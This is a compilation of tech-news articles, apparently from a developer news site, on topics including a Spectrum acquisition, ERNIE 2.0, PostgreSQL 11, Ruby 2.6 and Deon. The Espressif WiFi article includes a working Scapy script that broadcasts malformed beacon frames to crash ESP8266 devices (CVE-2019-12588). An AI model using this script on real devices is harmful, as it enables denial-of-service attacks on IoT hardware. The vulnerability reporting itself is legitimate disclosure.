Tech News

3709 Articles

GitHub acquires Spectrum, a community-centric conversational platform

Savia Lobo
03 Dec 2018
2 min read
Last week, Bryn Jackson, CEO of Spectrum, a real-time community-centered conversational platform, announced that the platform has been acquired by GitHub. Bryn, along with Brian Lovin and Max Stoiber, founded the Spectrum community platform in February 2017. The community is a place to ask questions, request features, report bugs, and chat with the Spectrum team. In a blog post, Bryn wrote, “After releasing an early prototype, people told us they also wanted to use it for their communities, so we decided to go all-in and build an open, inclusive home for developer and designer communities. Since officially launching the platform late last year, Spectrum has become home to almost 5,000 communities!”

What will Spectrum bring to GitHub communities?

By joining GitHub, Spectrum aims to align with GitHub’s goals of making developers’ lives easier and of fostering a strong community across the globe. For communities across GitHub, Spectrum will provide:

A space for different communities across the internet.
Free access to its full suite of features, including unlimited moderators, private communities and channels, and community analytics.
A deeper integration with GitHub.

Spectrum has also opened a pull request to add some of GitHub’s policies to Spectrum’s Privacy Policy, which will be merged this week. Though many users had not heard of Spectrum before, they are reacting positively to its acquisition by GitHub. Many users have also compared it with other platforms such as Slack, Discord, and Gitter.

To know more about this news, read Bryn Jackson’s blog post.

GitHub Octoverse: The top programming languages of 2018
GitHub has passed an incredible 100 million repositories
GitHub now allows repository owners to delete an issue: curse or a boon?


Baidu open sources ERNIE 2.0, a continual pre-training NLP model that outperforms BERT and XLNet on 16 NLP tasks

Fatema Patrawala
30 Jul 2019
3 min read
Today, Baidu released ERNIE 2.0, a continual pre-training framework for natural language processing. ERNIE stands for Enhanced Representation through kNowledge IntEgration. Baidu claims in its research paper that ERNIE 2.0 outperforms BERT and the recent XLNet on 16 NLP tasks in Chinese and English. Additionally, Baidu has open sourced the ERNIE 2.0 model.

In March, Baidu announced the release of ERNIE 1.0, its pre-trained model based on PaddlePaddle, Baidu’s open deep learning platform. According to Baidu, ERNIE 1.0 outperformed BERT in all Chinese language understanding tasks.

The pre-training procedures of models such as BERT, XLNet, and ERNIE 1.0 are mainly based on a few simple tasks modeling the co-occurrence of words or sentences, the paper highlights. For example, BERT constructed a bidirectional language model task and a next-sentence prediction task to capture the co-occurrence information of words and sentences, while XLNet constructed a permutation language model task to capture the co-occurrence information of words. But besides co-occurrence information, there is much richer lexical, syntactic, and semantic information in training corpora. For example, named entities, such as person names, place names, and organization names, contain concept information; sentence order and sentence proximity information can enable models to learn structure-aware representations; and semantic similarity at the document level or discourse relations among sentences can enable models to learn semantic-aware representations. So, is it possible to further improve performance if the model is trained to learn more kinds of tasks continually?

(Image source: ERNIE 2.0 research paper)

Based on this idea, Baidu has proposed a continual pre-training framework for language understanding in which pre-training tasks can be incrementally built and learned through multi-task learning in a continual way. According to Baidu, in this framework different customized tasks can be introduced incrementally at any time, and these tasks are trained through multi-task learning, which enables the encoding of lexical, syntactic, and semantic information across tasks. Whenever a new task arrives, the framework can incrementally train the distributed representations without forgetting the previously trained parameters.

The Structure of the Released ERNIE 2.0 Model (Image source: ERNIE 2.0 research paper)

ERNIE is a continual pre-training framework that provides a feasible scheme for developers to build their own NLP models. The fine-tuning source code of ERNIE 2.0 and pre-trained English-version models can be downloaded from the GitHub page.

The team at Baidu compared the performance of the ERNIE 2.0 model with existing pre-training models on the English GLUE dataset and on 9 popular Chinese datasets separately. The results show that ERNIE 2.0 outperforms BERT and XLNet on 7 GLUE language understanding tasks and outperforms BERT on all 9 Chinese NLP tasks, such as DuReader machine reading comprehension, sentiment analysis, and question answering. Specifically, according to the experimental results on the GLUE datasets, ERNIE 2.0 almost comprehensively outperforms BERT and XLNet on English tasks, for both the base and large models. Furthermore, the research paper shows that the ERNIE 2.0 large model achieves the best performance and sets new results on the Chinese NLP tasks.

(Image source: ERNIE 2.0 research paper)

To know more about ERNIE 2.0, read the research paper and check out the official blog on Baidu’s website.
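ERNIE itself is built on PaddlePaddle, but the continual multi-task idea can be sketched in a few lines of PyTorch. The following toy example is our illustration, not Baidu's code: a shared encoder with one head per task, where each newly arriving task is trained jointly with all earlier tasks, so previously learned parameters are refined rather than overwritten.

```python
import torch
import torch.nn as nn

class ContinualModel(nn.Module):
    """Shared encoder with one output head per pre-training task."""
    def __init__(self, in_dim=16, hidden=64):
        super().__init__()
        self.encoder = nn.Sequential(nn.Linear(in_dim, hidden), nn.ReLU())
        self.hidden = hidden
        self.heads = nn.ModuleDict()

    def add_task(self, name, n_classes):
        self.heads[name] = nn.Linear(self.hidden, n_classes)

    def forward(self, x, task):
        return self.heads[task](self.encoder(x))

model = ContinualModel()
loss_fn = nn.CrossEntropyLoss()
tasks = {}  # toy stand-ins for lexical/syntactic/semantic objectives

for name in ["lexical", "syntactic", "semantic"]:
    # A new task arrives: add a head, then train on ALL tasks seen so far
    # (multi-task learning), so earlier knowledge is not forgotten.
    tasks[name] = (torch.randn(32, 16), torch.randint(0, 2, (32,)))
    model.add_task(name, n_classes=2)
    opt = torch.optim.Adam(model.parameters(), lr=1e-3)  # includes new head
    for _ in range(50):
        opt.zero_grad()
        loss = sum(loss_fn(model(x, t), y) for t, (x, y) in tasks.items())
        loss.backward()
        opt.step()
```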
DeepMind’s AI uses reinforcement learning to defeat humans in multiplayer games
CMU and Google researchers present XLNet: a new pre-training method for language modeling that outperforms BERT on 20 tasks
Transformer-XL: A Google architecture with 80% longer dependency than RNNs


Espressif IoT devices susceptible to WiFi vulnerabilities that can allow hijackers to crash devices connected to enterprise networks

Savia Lobo
05 Sep 2019
4 min read
Matheus Eduardo Garbelini, a member of the ASSET (Automated Systems SEcuriTy) Research Group at the Singapore University of Technology and Design, released a proof of concept for three WiFi vulnerabilities in Espressif’s IoT devices, the ESP32 and ESP8266.

3 WiFi vulnerabilities on the ESP32/ESP8266 IoT devices

Zero PMK Installation (CVE-2019-12587)

This WiFi vulnerability allows hijacking of ESP32 and ESP8266 clients connected to enterprise networks. It allows an attacker to take control of the device’s WiFi EAP session by sending an EAP-Fail message in the final step of the connection between the device and the access point. The researcher discovered that both IoT devices update their Pairwise Master Key (PMK) only when they receive an EAP-Success message. If an EAP-Fail message is received before the EAP-Success, the device skips updating the PMK received during a normal EAP exchange (EAP-PEAP, EAP-TTLS, or EAP-TLS), yet still accepts the EAPoL 4-way handshake. Each time the ESP32/ESP8266 starts, the PMK is initialized to zero; thus, if an EAP-Fail message is sent before the EAP-Success, the device uses a zero PMK, allowing the attacker to hijack the connection between the AP and the device.

ESP32/ESP8266 EAP client crash (CVE-2019-12586)

This WiFi vulnerability is found in the SDKs of the ESP32 and ESP8266 and allows an attacker in radio range to precisely cause a crash in any ESP32/ESP8266 connected to an enterprise network. In combination with the zero PMK installation vulnerability, it could increase the damage to any unpatched device. Espressif has fixed the problem and committed patches for the ESP32 SDK; however, the SDK and Arduino board support for the ESP8266 remain unpatched.

ESP8266 Beacon Frame Crash (CVE-2019-12588)

In this vulnerability, the client 802.11 MAC implementation in Espressif ESP8266 NONOS SDK 3.0 and earlier does not correctly validate the RSN AuthKey suite list count in beacon frames, probe responses, and association responses, which allows attackers in radio range to cause a denial of service (crash) via a crafted message. Two kinds of malformed beacon frames can trigger the problem:

When crafted 802.11 frames are sent with the Auth Key Management (AKM) Suite Count field in the RSN tag too large or incorrect, an ESP8266 in station mode crashes.
When crafted 802.11 frames are sent with the Pairwise Cipher Suite Count field in the RSN tag too large or incorrect, an ESP8266 in station mode crashes.

“The attacker sends a malformed beacon or probe response to an ESP8266 which is already connected to an access point. However, it was found that ESP8266 can crash even when there’s no connection to an AP, that is even when ESP8266 is just scanning for the AP,” the researcher says.
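To picture the malformed frame behind CVE-2019-12588, here is a rough sketch using Scapy. This is an illustrative reconstruction based on the description above, not the researcher's PoC; the interface name and MAC addresses are placeholders, and it should only ever be pointed at hardware you own.

```python
from scapy.all import RadioTap, Dot11, Dot11Beacon, Dot11Elt, sendp

# RSN information element whose AKM suite count (255) claims far more
# suites than the element actually carries -- the bogus count that the
# unpatched ESP8266 fails to validate.
rsn = (
    b"\x01\x00"          # RSN version 1
    b"\x00\x0f\xac\x04"  # group cipher suite: CCMP
    b"\x01\x00"          # pairwise cipher suite count: 1
    b"\x00\x0f\xac\x04"  # pairwise cipher suite: CCMP
    b"\xff\x00"          # AKM suite count: 255 (malformed)
    b"\x00\x0f\xac\x02"  # only one AKM suite actually present
)

frame = (
    RadioTap()
    / Dot11(type=0, subtype=8,                 # management / beacon
            addr1="ff:ff:ff:ff:ff:ff",         # broadcast
            addr2="02:00:00:00:00:01",         # spoofed AP MAC (placeholder)
            addr3="02:00:00:00:00:01")
    / Dot11Beacon()
    / Dot11Elt(ID="SSID", info=b"test-ap")
    / Dot11Elt(ID=48, info=rsn)                # ID 48 = RSN element
)

# Requires a monitor-mode interface; "wlan0mon" is a placeholder name.
sendp(frame, iface="wlan0mon", count=10, inter=0.1)
```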
A user on Hacker News writes, “Due to cheap price ($2—$5 depending on the model) and very low barrier to entry technically, these devices are both very popular as well as very widespread in those two categories. These chips are the first hits for searches such as "Arduino wifi module", "breadboard wifi", "IoT wifi module", and many, many more as they're the downright easiest way to add wifi to something that doesn't have it out of the box. I'm not sure how applicable these attack vectors are in the real world, but they affect a very large number of devices for sure.”

To know more about this news in detail, read the Proof of Concept on GitHub.

Other interesting news in IoT security

Cisco Talos researchers disclose eight vulnerabilities in Google’s Nest Cam IQ indoor camera
Microsoft reveals Russian hackers “Fancy Bear” are the culprit for IoT network breach in the U.S.
Researchers reveal vulnerability that can bypass payment limits in contactless Visa card


Stack skills, not degrees: Industry-leading companies Google, IBM, and Apple no longer require degrees

Bhagyashree R
22 Aug 2018
3 min read
Can you guess what is common between Bill Gates, Steve Jobs, Michael Dell, and Larry Ellison? Yes, they are very successful trendsetters in tech, some being founders or co-founders of top tech companies. But what else? They are also college dropouts. The point I want to highlight here is that real skills are more important than acquired college degrees. If you do not have a college degree but have the skill set a company wants, you are in! In today’s economy it is important to have hands-on experience instead of being only book smart.

Last week, the job search website Glassdoor compiled a list of top companies that do not require a four-year college degree as long as you have the skills required. The list includes some of the top tech companies, such as Google, Apple, and IBM. Google has stated this clearly on its web page (image source: Google).

If no degrees, then what?

Now, you must be thinking that if these companies are not looking at your GPA, then how are they going to shortlist the large number of applications coming their way? Remember the names I called out in the beginning? They have something more in common. They believed in self-learning, were passionate and innovative, and had clear goals.

Sam Ladah, IBM’s head of talent organization, calls these types of jobs “new-collar jobs.” He told Marketplace in an interview that IBM considers applicants based on their skills. This includes applicants who didn’t get a four-year degree but have proven their technical knowledge in other ways. Some have technical certifications, and others have enrolled in other skills programs. IBM has also been finding talent from coding bootcamps.

A very good example of finding talent beyond traditional educational boundaries is Tanmay Bakshi, one of the youngest software programmers in the world. At the age of 11, he came across a documentary on IBM Watson and how it played Jeopardy. He was immediately hooked on IBM Watson and AI, and found inspiration to build his first Watson app, called “Ask Tanmay”. Later, he found a bug in IBM’s Document Conversion service and posted it on Twitter. IBMers working on the service took note and contacted Tanmay. Two of those initial contacts eventually became his mentors and assisted him in collaborating with IBM.

Even if you have a degree in another field but are keen on learning software development and bagging a job at a top tech company, you can start anytime. Margaret Hamilton, the Director of the Software Engineering Division of the MIT Instrumentation Laboratory in the 1960s and later the CEO of Hamilton Technologies, Inc., was actually a mathematics graduate. Angela Taylor, who was working in HR at Google, became a Google engineer through her hard work and can-do attitude. She fell in love with programming when she volunteered to fix a spreadsheet and learned Visual Basic for it.

These are a few examples of people who were able to challenge the current education system and become successful. Here is a great Medium post with some amazing tips to further your career if you are a coder but not an engineer.

1k+ Google employees frustrated with continued betrayal, protest against Censored Search engine project for China
16 year old hacked into Apple’s servers, accessed ‘extremely secure’ customer accounts for over a year undetected
Facebook, Apple, Spotify pull Alex Jones content


PostgreSQL 11 is here with improved partitioning performance, query parallelism, and JIT compilation

Natasha Mathur
19 Oct 2018
3 min read
After releasing PostgreSQL 11 beta 1 back in May, the PostgreSQL Global Development Group finally released PostgreSQL 11 yesterday. PostgreSQL 11 introduces features such as increased performance for partitioning, support for transactions in stored procedures, improved capabilities for query parallelism, and Just-in-Time (JIT) compilation for expressions, among other updates. PostgreSQL is a popular open source relational database management system known for its reliability, robustness, and performance. Let’s have a look at these features in PostgreSQL 11.

Increased performance for partitioning

PostgreSQL 11 adds the ability to partition data using a hash key, which is known as hash partitioning. This adds to the already existing ability to partition data in PostgreSQL by a list of values or by a range. Moreover, PostgreSQL 11 also improves data federation abilities with functionality improvements for partitions using the PostgreSQL foreign data wrapper, postgres_fdw. For managing these partitions, PostgreSQL 11 comes with a “catch-all” default partition for data that doesn’t match a partition key, and with the ability to create primary keys, foreign keys, indexes, and triggers on partitioned tables. The latest release also supports automatic movement of rows to the correct partition when the partition key for that row is updated. Additionally, PostgreSQL 11 improves query performance when reading from partitions with the help of a new partition elimination strategy. It also supports the popular “upsert” feature on partitioned tables, which helps users simplify application code and reduce network overhead when interacting with their data.

Support for transactions in stored procedures

PostgreSQL 11 adds SQL procedures that can perform full transaction management within their body, enabling developers to build advanced server-side applications, such as those involving incremental bulk data loading. SQL procedures are created using the CREATE PROCEDURE command and executed using the CALL command, and they are supported by the server-side procedural languages PL/pgSQL, PL/Perl, PL/Python, and PL/Tcl.

Improved capabilities for query parallelism

PostgreSQL 11 enhances parallel query performance, with performance gains in parallel sequential scans and hash joins, and more efficient scans of partitioned data. PostgreSQL 11 adds parallelism for a range of data definition commands, especially the creation of B-tree indexes generated by executing the standard CREATE INDEX command. Data definition commands that either create tables or materialize views from queries are also now parallel-enabled, including CREATE TABLE .. AS, SELECT INTO, and CREATE MATERIALIZED VIEW.

Just-in-Time (JIT) compilation for expressions

PostgreSQL 11 offers support for Just-in-Time (JIT) compilation, which helps accelerate the execution of certain expressions during query execution. The JIT expression compilation uses the LLVM project to boost the execution of expressions in WHERE clauses, target lists, aggregates, projections, and some other internal operations.

Other improvements

ALTER TABLE .. ADD COLUMN .. DEFAULT .. with a non-NULL default no longer rewrites the whole table on execution, which offers a significant performance boost when running this command. Additional functionality has been added for working with window functions, including allowing RANGE to use PRECEDING/FOLLOWING, GROUPS, and frame exclusion. Keywords such as "quit" and "exit" have been added to the PostgreSQL command-line interface to make it easier to leave the command-line tool.
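As a quick illustration of hash partitioning and in-procedure transaction control, here is a sketch that drives PostgreSQL 11 from Python with psycopg2. The database, table, partition, and procedure names are invented for the example.

```python
import psycopg2

# Assumes a local PostgreSQL 11 database named "demo".
conn = psycopg2.connect(dbname="demo")
conn.autocommit = True  # procedures that COMMIT need no outer transaction
cur = conn.cursor()

# Hash partitioning: rows are routed to a partition by a hash of the key.
cur.execute("""
    CREATE TABLE events (id bigint, payload text) PARTITION BY HASH (id);
""")
for i in range(4):
    cur.execute(f"""
        CREATE TABLE events_p{i} PARTITION OF events
        FOR VALUES WITH (MODULUS 4, REMAINDER {i});
    """)

# A procedure that commits in batches -- transaction control inside the
# body is new in PostgreSQL 11 (not possible in plain functions).
cur.execute("""
    CREATE PROCEDURE bulk_load(n int) LANGUAGE plpgsql AS $$
    BEGIN
      FOR i IN 1..n LOOP
        INSERT INTO events VALUES (i, 'row ' || i);
        IF i % 1000 = 0 THEN COMMIT; END IF;
      END LOOP;
    END $$;
""")
cur.execute("CALL bulk_load(5000);")
```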
For more information, check out the official release notes.

PostgreSQL group releases an update to 9.6.10, 9.5.14, 9.4.19, 9.3.24
How to perform data partitioning in PostgreSQL 10
How to write effective Stored Procedures in PostgreSQL


Magic Leap unveils Mica, a human-like AI in augmented reality

Sugandha Lahoti
12 Oct 2018
3 min read
In the keynote of its developer conference L.E.A.P., which took place Wednesday, Magic Leap showed a demo of its new human-like AI. Dubbed Mica, she can communicate with a viewer through the company’s augmented reality glasses, the Magic Leap One Creator Edition. Mica takes the form of a short-haired woman whose facial expressions closely resemble those of a real human. She does not speak but can still communicate in warm ways with the viewer. The project was presented at the Magic Leap L.E.A.P. event by Andrew Rabinovich, head of AI at Magic Leap, and John Monos, head of human-centered AI.

According to the keynote, Mica is their prototype for developing systems that create digital human representations. The first prototype featured realistic eye gaze and eye movement. Artificial intelligence components were then added to track users and look them in the eye, and additional AI elements were added for body language and posture. According to Nick Whiting from Epic Games, Mica is powered by Unreal Engine 4.

Magic Leap focused on creating natural facial expressions that can emote in believable ways; the main goal was to create facial elements that connect users to her. Mica came out as an ideal interface to human-centered AI that evokes natural reactions from users. Mica adapts her interactions and intelligence to what people expect: the user’s focus shapes her temperament, and her personality traits and mannerisms align with how users behave with her.

VentureBeat’s correspondent was invited for a demo of Mica. Per his experience, “I walked into a physical room and sat in a chair. Mica was sitting at the table in the same room. She smiled at me and looked at me. I was struck that she wasn’t just looking at me. She was looking in my eyes. She tilted her head from side to side. When I noticed how attentive she was, I moved my head forward and looked in her eyes. She did the same and looked at me. I moved my head back and she moved her head back too. She was mimicking some of the movements that she saw me make. She didn’t talk, but that is coming in the future.”

Magic Leap’s Mica is a clear indication of what virtual assistants will look like for most people in the very near future. Read more about Magic Leap’s L.E.A.P. conference to know what else was announced. You may also watch the keynote.

Magic Leap teams with Andy Serkis’ Imaginarium Studios to enhance Augmented Reality
Understanding the hype behind Magic Leap’s New Augmented Reality Headsets
Magic Leap One, the first mixed reality headsets by Magic Leap, is now available at $2295

Ruby 2.6.0 released with a new JIT compiler

Prasad Ramesh
26 Dec 2018
2 min read
Ruby 2.6.0 was released yesterday and brings a new JIT compiler. The new version also adds the RubyVM::AbstractSyntaxTree module.

The new JIT compiler in Ruby 2.6.0

Ruby 2.6.0 comes with an early implementation of a Just-in-Time (JIT) compiler, introduced to improve the performance of Ruby programs. Traditional JIT compilers operate in-process, but Ruby’s JIT compiler writes C code out to disk and spawns a common C compiler to generate native code. To enable the JIT compiler, you just need to specify --jit either on the command line or in the $RUBYOPT environment variable. Using --jit-verbose=1 will cause the JIT compiler to print additional information. The JIT compiler works only when Ruby is built with GCC, Clang, or Microsoft Visual C++, and one of these compilers needs to be available at runtime. On Optcarrot, a CPU-intensive benchmark, Ruby 2.6 delivers 1.7x faster performance compared to Ruby 2.5. The JIT compiler, however, is still experimental, and workloads like Rails might not benefit from it for now.

The RubyVM::AbstractSyntaxTree module

Ruby 2.6 brings the RubyVM::AbstractSyntaxTree module; the team does not guarantee any future compatibility of this module. The module has a parse method, which parses the given string as Ruby code and returns the Abstract Syntax Tree (AST) nodes of the code. The parse_file method opens and parses the given file as Ruby code, likewise returning AST nodes. A RubyVM::AbstractSyntaxTree::Node class, another experimental feature, is also introduced in Ruby 2.6.0. Developers can get source locations and child nodes from the Node objects.

To know more about other new features and improvements in detail, visit the Ruby 2.6.0 release notes.

8 programming languages to learn in 2019
Clojure 1.10 released with Prepl, improved error reporting and Java compatibility
NumPy drops Python 2 support. Now you need Python 3.5 or later.


Facebook mandates Visual Studio Code as default development environment and partners with Microsoft for remote development extensions

Fatema Patrawala
21 Nov 2019
4 min read
On Tuesday, Facebook mandated Visual Studio Code, the source code editor developed by Microsoft, as its default development environment. Additionally, the company stated that it will work with Microsoft to expand the remote development extensions for Visual Studio Code so that engineers can do large-scale remote development.

As per the official announcement, Facebook engineers have written millions of lines of code, yet there has been no mandated development environment. Until now, Facebook developers used Vim or Emacs, and the development environment was disjointed. Certain developers also used Nuclide, an integrated development environment developed by Facebook, but in late 2018 the company announced to its internal engineers that it would move Nuclide to Visual Studio Code. It has since done plenty of development work to migrate the current Nuclide functionality, along with new features, to Visual Studio Code, which is already used extensively across the company in beta.

Why Visual Studio Code?

Visual Studio Code is a very popular development tool with great support from Microsoft and the open source community. It runs on macOS, Windows, and Linux, and has a robust and well-defined extension API that enables Facebook to continue building the important capabilities required for its large-scale development. The company believes it is a platform on which it can safely bet its development-platform future.

Facebook has also partnered with Microsoft for remote development. At present, Facebook engineers install Visual Studio Code on a local PC, but the actual development is done directly on a development server in the data center. The aim is to improve efficiency and productivity by making the code on the server accessible in a seamless and high-performance manner. The company believes that using remote extensions will provide many benefits:

Work with larger, faster, or more specialized hardware than what’s available on the local machine
Create tailored, dedicated environments for each project’s specific dependencies, without worrying about errors due to mixed or conflicting configurations
Support the flexibility of quickly switching between multiple running development environments without impacting local resources or tool performance

Because Facebook uses various programming languages, it is mandating Visual Studio Code as the integrated development environment to be used internally. Since it also uses Mercurial as its source control infrastructure, it will work on developing extensions to allow direct source control operations within Visual Studio Code.

Facebook states, “VS Code is now an established part of Facebook’s development future. In teaming with Microsoft, we’re looking forward to being part of the community that helps Visual Studio Code continue to be a world class development tool.”

On Hacker News, developers are discussing various issues related to the remote development extensions in VS Code; one of them is that the extensions are not open source, and that Facebook should put its efforts behind a more open project. One comment reads, “Just an FYI for people - The Remote Development extensions are not open source. I'd hope if Facebook were joining efforts, they'd do so on a more open project. 1: https://code.visualstudio.com/docs/remote/faq#_why-arent-the... 2: https://github.com/microsoft/vscode/wiki/Differences-between... 3: https://github.com/VSCodium/vscodium/issues/240 (aka, on-the-wire DRM to make sure the remote components only talk to a licensed VS Code build from Microsoft) MS edited the licensing terms many moons ago, to prepare for VS Code in browser using these remote extensions/apis that no one else can use) - https://github.com/microsoft/vscode/issues/48279 Finally, this is the thread where you will see regular users being negatively impacted by the DRM (a closed source, non-statically linked proprietary binary downloaded at runtime) that implements this proprietary-ness: https://github.com/microsoft/vscode-remote-release/issues/10... (of course, also with enough details to potentially patch around this issue if you were so inclined). Further, MS acknowledged that statically linking would help in May, and yet it appears to still be an issue. I just hope they don't come after Eclipse Theia…”

Microsoft releases Cascadia Code version 1909.16, the latest monospaced font for Windows Terminal and Visual Studio Code
12 Visual Studio Code extensions that Node.js developers will love [Sponsored by Microsoft]
5 developers explain why they use Visual Studio Code [Sponsored by Microsoft]
5 useful Visual Studio Code extensions for Angular developers
Facebook releases PyTorch 1.3 with named tensors, PyTorch Mobile, 8-bit model quantization, and more


Unity Benchmark report validates WebAssembly load times and performance in popular web browsers

Sugandha Lahoti
18 Sep 2018
2 min read
Unity has released a benchmarking report, two years after the last Unity Benchmark report, comparing the performance and load times of WebAssembly with asm.js. The team compared the performance of Unity WebGL in four major web browsers: Firefox 61, Chrome 70, Safari 11.1.2, and Edge 17. Last month, Unity officially announced that it is finally making the switch to WebAssembly as the output format for the Unity WebGL build target.

Note: All images and graphs are taken from the Unity Blog.

For running the tests, the team rebuilt the Benchmark project with Unity 2018.2.5f1 using a fixed set of Unity WebGL Player Settings (shown in the original post). Here are the findings from the report.

Criteria 1: Total amount of time taken to get to the main screen, for both WebAssembly and asm.js.

Findings:
Firefox is comparatively fast to load on both Windows and macOS.
Chrome and Edge load faster when using WebAssembly.
All browsers, except Safari, load faster with WebAssembly compared to asm.js.

Criteria 2: In-depth load times, WebAssembly only. The team compared four factors: WebAssembly compilation and instantiation; Unity engine initialization and first scene load; time taken to render the first frame; and time taken to load and reach a stable frame rate.

Findings:
Firefox is the fastest overall on both Windows and Mac.
Edge compiles Wasm quickly (even faster than Firefox) but is slower in Unity engine initialization.

Criteria 3: Performance and load times for real-world projects. Real-world projects result in larger builds, which impact the end user’s experience. Here is an overview of total scores using WebAssembly and asm.js.

Findings:
All browsers perform better when using WebAssembly.
On Windows, all browsers perform similarly.
On macOS, Firefox outperforms all other browsers.
Safari is the browser that benefits the most from WebAssembly, since it doesn’t support asm.js optimizations.

Conclusion

The report findings conclude that modern browsers load faster and perform better thanks to WebAssembly. It also provides a more consistent user experience compared to asm.js. Read more about the findings on the Unity Blog.

Unity releases ML-Agents toolkit v0.5 with Gym interface, a new suite of learning environments
Key Takeaways from the Unity Game Studio Report 2018
Unity switches to WebAssembly as the output format for the Unity WebGL build target


Introducing PyOxidizer, an open source utility for producing standalone Python applications, written in Rust

Bhagyashree R
26 Jun 2019
4 min read
On Monday, Gregory Szorc, a Developer Productivity Engineer at Airbnb, introduced PyOxidizer, a Python application packaging and distribution tool written in Rust. The tool is available for Windows, macOS, and Linux. Sharing his vision behind the tool, Szorc wrote in the announcement, “I want PyOxidizer to provide a Python application packaging and distribution experience that just works with a minimal cognitive effort from Python application maintainers.”

https://twitter.com/indygreg/status/1143187250743668736

PyOxidizer aims to solve complex packaging and distribution problems so that developers can put their efforts into building applications instead of juggling build systems and packaging tools. According to the GitHub README, “PyOxidizer is a collection of Rust crates that facilitate building libraries and binaries containing Python interpreters.” Its most visible component is the ‘pyoxidizer’ command line tool. With this tool, you can create new projects, add PyOxidizer to existing projects, produce binaries containing a Python interpreter, and access various related functionality.

How PyOxidizer is different from other Python application packaging/distribution tools

PyOxidizer provides the following benefits over other Python application packaging/distribution tools:

It works across all popular platforms, unlike many other tools that only target Windows or macOS.
It works even if the executing system does not have Python installed.
It does not have special system requirements like SquashFS, container runtimes, etc.
Its startup performance is comparable to traditional Python execution.
It supports single-file executables with minimal or no system dependencies.

Here are some of the features PyOxidizer comes with:

Generates a standalone single executable file

One of the most important features of PyOxidizer is that it can produce a single executable file containing a fully featured Python interpreter, its extensions, the standard library, and your application’s modules and resources. PyOxidizer embeds self-contained Python interpreters as a tool and a software library by exposing its lower-level functionality.

Serves as a bridge between Rust and Python

The ‘Oxidizer’ part of the name comes from Rust. Internally, PyOxidizer uses Rust to produce executables and manage the embedded Python interpreter and its operations. Along with solving the problem of packaging and distribution with Rust, PyOxidizer can also serve as a bridge between these two languages, making it possible to add a Python interpreter to any Rust project and vice versa. With PyOxidizer, you can bootstrap a new Rust project that contains an embedded version of Python and your application. “Initially, your project is a few lines of Rust that instantiates a Python interpreter and runs Python code. Over time, the functionality could be (re)written in Rust and your previously Python-only project could leverage Rust and its diverse ecosystem,” explained Szorc. The creator chose Rust for the runtime and build-time components because it is considered one of the superior systems programming languages and does not require considerable effort to solve difficult problems like cross-compiling. He believes that implementing the embedding component in Rust also opens more opportunities to embed Python in Rust programs. “This is largely an unexplored area in the Python ecosystem and the author hopes that PyOxidizer plays a part in more people embedding Python in Rust,” he added.

PyOxidizer executables are faster to start and import

During execution, binaries built with PyOxidizer do not have to do anything special, like creating a temporary directory, to run the Python interpreter. Everything is loaded directly from memory without any explicit I/O operations. When a Python module is imported, its bytecode is loaded from a memory address in the executable using zero-copy. This makes the executables produced by PyOxidizer faster to start and import.

PyOxidizer is still in its early stages. Yesterday’s initial release is good at producing executables embedding Python; however, not much has been implemented yet to solve the distribution part of the problem. Missing features we can expect in the future include an official build environment, support for C extensions, more robust packaging support, easy distribution, and more. The creator encourages Python developers to try the tool and share feedback with him or file an issue on GitHub. You can also contribute to the project via Patreon or PayPal.

Many users are excited to try the tool:

https://twitter.com/kevindcon/status/1143750501592211456
https://twitter.com/acemarke/status/1143389113871040517

Read the announcement made by Szorc to know more in detail.

Python 3.8 beta 1 is now ready for you to test
PyPI announces 2FA for securing Python package downloads
Matplotlib 3.1 releases with Python 3.6+ support, secondary axis support, and more

Introducing Deon, a tool for data scientists to add an ethics checklist

Natasha Mathur
06 Sep 2018
5 min read
DrivenData has come out with a new tool, named Deon, which allows you to easily add an ethics checklist to your data science projects. Deon is aimed at pushing forward the conversation about ethics in data science, machine learning, and artificial intelligence by providing actionable reminders to data scientists.

According to the Deon team, “it's not up to data scientists alone to decide what the ethical course of action is. This has always been a responsibility of organizations that are part of civil society. This checklist is designed to provoke conversations around issues where data scientists have particular responsibility and perspective.”

Deon comes with a default checklist, but you can also develop your own custom checklists by removing items and sections, or marking items as N/A, depending on the needs of the project. There are also real-world examples linked to each item in the default checklist. To run Deon for your data science projects, you need Python 3 or greater. Let’s now discuss the two types of checklists, default and custom, that come with Deon.

Default checklist

The default checklist comprises sections on Data Collection, Data Storage, Analysis, Modeling, and Deployment.

Data Collection

This section covers informed consent, collection bias, and limiting PII exposure. Informed consent includes a mechanism for gathering consent where users have a clear understanding of what they are consenting to. Collection bias checks for sources of bias introduced during data collection and survey design. Lastly, limiting PII exposure covers ways to minimize the exposure of personally identifiable information (PII).

Data Storage

This section covers data security, the right to be forgotten, and a data retention plan. Data security refers to a plan to protect and secure data. The right to be forgotten includes a mechanism by which an individual can have his/her personal information removed. The data retention plan covers deleting the data when it is no longer needed.

Analysis

This section comprises missing perspectives, dataset bias, honest representation, privacy in analysis, and auditability. Missing perspectives addresses blind spots in data analysis through engagement with relevant stakeholders. Dataset bias covers examining the data for possible sources of bias and taking steps to mitigate or address them. Honest representation checks whether visualizations, summary statistics, and reports are designed to honestly represent the underlying data. Privacy in analysis ensures that data with PII is not used or displayed unless necessary for the analysis. Auditability refers to producing an analysis that is well documented and reproducible.

Modeling

This section covers proxy discrimination, fairness across groups, metric selection, explainability, and communicating bias. Proxy discrimination is about ensuring that the model does not rely on variables or proxies that are discriminatory. Fairness across groups cross-checks whether the model results have been tested for fairness with respect to different affected groups. Metric selection considers the effects of optimizing for the defined metrics, as well as additional metrics. Explainability is about explaining the model’s decisions in understandable terms. Communicating bias makes sure that the shortcomings, limitations, and biases of the model have been properly communicated to relevant stakeholders.

Deployment

This section covers redress, rollback, concept drift, and unintended use. Redress is about discussing with your organization a plan for responding in case users are harmed by the results. Rollback is about having a way to turn off or roll back the model in production when required. Concept drift refers to the relationship between input and output data in a problem changing over time; this part of the checklist reminds the user to test for and monitor concept drift, to ensure the model remains fair over time. Unintended use prompts the user about steps to be taken to identify and prevent unintended uses and abuse of the model.

Custom checklists

For projects with particular concerns, it is recommended to create your own checklist.yml file. Custom checklists are required to follow the same schema as checklist.yml: a top-level title, which is a string, and sections, which are a list. Each section in the list must have a title, a section_id, and then a list of lines. Each line must include a line_id, a line_summary, and a line string, which is the content. When changing the default checklist, keep in mind that Deon’s goal is to have checklist items that are actionable. This is why users are advised to avoid suggesting items that are vague (e.g., "do no harm") or extremely specific (e.g., "remove social security numbers from data").

For more information, be sure to check out the official DrivenData blog post.

The Cambridge Analytica scandal and ethics in data science
OpenAI charter puts safety, standards, and transparency first
20 lessons on bias in machine learning systems by Kate Crawford at NIPS 2017
